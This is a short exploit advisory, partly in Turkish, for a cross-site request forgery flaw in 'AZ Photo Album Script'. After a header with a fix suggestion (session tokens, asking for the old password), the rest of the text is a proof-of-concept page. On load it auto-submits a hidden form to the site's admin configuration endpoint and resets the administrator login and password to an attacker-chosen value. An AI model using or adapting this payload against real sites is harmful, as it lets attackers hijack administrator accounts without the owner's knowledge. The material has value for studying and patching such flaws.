< ------------------- header data start ------------------- >

#############################################################

# Application Name : AZ Photo Album Script

# Vulnerable Type : XSRF

# Infection : Uzaktan otomatik olarak admin pass change edilebilir.

# Bug Fix Advice : Form’a Oturum Key’i (Session Token) eklenmeli, eski sifre sorulmalidir.

# author : Bug Researchers/n0x

#############################################################

< ------------------- header data end of ------------------- >



< -- bug code start -- >

<b0dy onLoad=Submit();>
<script>function Submit[]{document.n0x.submit();}</script>

<form action=http://www.Site.com/[PATCH]/admin/index.php?cp=configure&action=save method=post enctype=multipart/form-data name=n0x >

<input type=hidden name=login value=addadd class=form >
<input type=hidden name=password value=addadd class=form >
<input type=hidden name=password2 value=addadd class=form >
<input type=hidden name=value[92] value=[email protected] size=10 class=form>
<input type=submit name=save value=Click class=button>

< -- bug code end of -- >